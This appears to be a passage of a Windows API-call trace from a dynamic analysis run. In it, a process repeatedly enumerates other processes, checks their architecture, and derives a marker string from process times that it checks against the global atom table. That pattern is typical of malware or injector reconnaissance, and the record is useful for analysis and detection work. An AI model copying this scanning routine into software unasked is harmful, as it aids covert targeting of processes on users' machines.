	[0118.589] CloseHandle (hObject=0x698) returned 1
	[0118.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0118.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.625] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.625] CloseHandle (hObject=0x698) returned 1
	[0118.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.626] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.626] CloseHandle (hObject=0x698) returned 1
	[0118.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0118.626] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.626] CloseHandle (hObject=0x698) returned 1
	[0118.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.627] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.627] CloseHandle (hObject=0x698) returned 1
	[0118.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.627] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.627] CloseHandle (hObject=0x698) returned 1
	[0118.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.627] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.627] CloseHandle (hObject=0x698) returned 1
	[0118.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.627] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.627] CloseHandle (hObject=0x698) returned 1
	[0118.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.627] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.627] CloseHandle (hObject=0x698) returned 1
	[0118.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.628] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.628] CloseHandle (hObject=0x698) returned 1
	[0118.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0118.628] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.628] CloseHandle (hObject=0x698) returned 1
	[0118.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.628] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.628] CloseHandle (hObject=0x698) returned 1
	[0118.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.628] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.628] CloseHandle (hObject=0x698) returned 1
	[0118.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.629] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.629] CloseHandle (hObject=0x698) returned 1
	[0118.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.629] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.629] CloseHandle (hObject=0x698) returned 1
	[0118.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.629] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.629] CloseHandle (hObject=0x698) returned 1
	[0118.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.629] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.629] CloseHandle (hObject=0x698) returned 1
	[0118.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.629] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.629] CloseHandle (hObject=0x698) returned 1
	[0118.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.630] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.630] CloseHandle (hObject=0x698) returned 1
	[0118.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.630] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.630] CloseHandle (hObject=0x698) returned 1
	[0118.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.630] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.630] CloseHandle (hObject=0x698) returned 1
	[0118.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.630] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.630] CloseHandle (hObject=0x698) returned 1
	[0118.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.630] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.630] CloseHandle (hObject=0x698) returned 1
	[0118.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.631] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.631] CloseHandle (hObject=0x698) returned 1
	[0118.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.631] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.631] CloseHandle (hObject=0x698) returned 1
	[0118.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.631] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.631] CloseHandle (hObject=0x698) returned 1
	[0118.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.631] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.631] CloseHandle (hObject=0x698) returned 1
	[0118.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.632] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.632] CloseHandle (hObject=0x698) returned 1
	[0118.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.632] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.632] CloseHandle (hObject=0x698) returned 1
	[0118.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.632] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.632] CloseHandle (hObject=0x698) returned 1
	[0118.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.632] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.632] CloseHandle (hObject=0x698) returned 1
	[0118.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.632] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.632] CloseHandle (hObject=0x698) returned 1
	[0118.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.633] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.633] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.633] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.633] wsprintfA (in: param_1=0x3993c40, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.634] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.634] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.634] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.634] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.634] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.634] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.634] CloseHandle (hObject=0x698) returned 1
	[0118.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.635] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.635] CloseHandle (hObject=0x698) returned 1
	[0118.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.635] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.635] CloseHandle (hObject=0x698) returned 1
	[0118.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.635] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.635] CloseHandle (hObject=0x698) returned 1
	[0118.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0118.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.681] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.681] CloseHandle (hObject=0x698) returned 1
	[0118.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.681] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.681] CloseHandle (hObject=0x698) returned 1
	[0118.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0118.682] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.682] CloseHandle (hObject=0x698) returned 1
	[0118.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.682] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.682] CloseHandle (hObject=0x698) returned 1
	[0118.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.682] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.682] CloseHandle (hObject=0x698) returned 1
	[0118.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.682] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.682] CloseHandle (hObject=0x698) returned 1
	[0118.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.682] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.683] CloseHandle (hObject=0x698) returned 1
	[0118.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.683] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.683] CloseHandle (hObject=0x698) returned 1
	[0118.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.683] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.683] CloseHandle (hObject=0x698) returned 1
	[0118.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0118.683] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.683] CloseHandle (hObject=0x698) returned 1
	[0118.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.684] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.684] CloseHandle (hObject=0x698) returned 1
	[0118.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.684] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.684] CloseHandle (hObject=0x698) returned 1
	[0118.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.684] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.684] CloseHandle (hObject=0x698) returned 1
	[0118.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.684] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.684] CloseHandle (hObject=0x698) returned 1
	[0118.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.684] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.685] CloseHandle (hObject=0x698) returned 1
	[0118.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.685] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.685] CloseHandle (hObject=0x698) returned 1
	[0118.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.685] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.685] CloseHandle (hObject=0x698) returned 1
	[0118.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.685] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.685] CloseHandle (hObject=0x698) returned 1
	[0118.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.685] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.685] CloseHandle (hObject=0x698) returned 1
	[0118.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.686] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.686] CloseHandle (hObject=0x698) returned 1
	[0118.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.686] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.686] CloseHandle (hObject=0x698) returned 1
	[0118.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.686] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.686] CloseHandle (hObject=0x698) returned 1
	[0118.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.686] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.686] CloseHandle (hObject=0x698) returned 1
	[0118.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.687] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.687] CloseHandle (hObject=0x698) returned 1
	[0118.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.687] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.687] CloseHandle (hObject=0x698) returned 1
	[0118.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.687] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.687] CloseHandle (hObject=0x698) returned 1
	[0118.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.687] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.687] CloseHandle (hObject=0x698) returned 1
	[0118.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.687] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.687] CloseHandle (hObject=0x698) returned 1
	[0118.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.688] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.688] CloseHandle (hObject=0x698) returned 1
	[0118.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.688] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.688] CloseHandle (hObject=0x698) returned 1
	[0118.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.688] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.688] CloseHandle (hObject=0x698) returned 1
	[0118.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.689] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.689] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.689] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.689] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.690] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.690] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.690] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.690] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.690] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.690] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.690] CloseHandle (hObject=0x698) returned 1
	[0118.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.691] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.691] CloseHandle (hObject=0x698) returned 1
	[0118.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.691] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.691] CloseHandle (hObject=0x698) returned 1
	[0118.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.691] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.691] CloseHandle (hObject=0x698) returned 1
	[0118.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
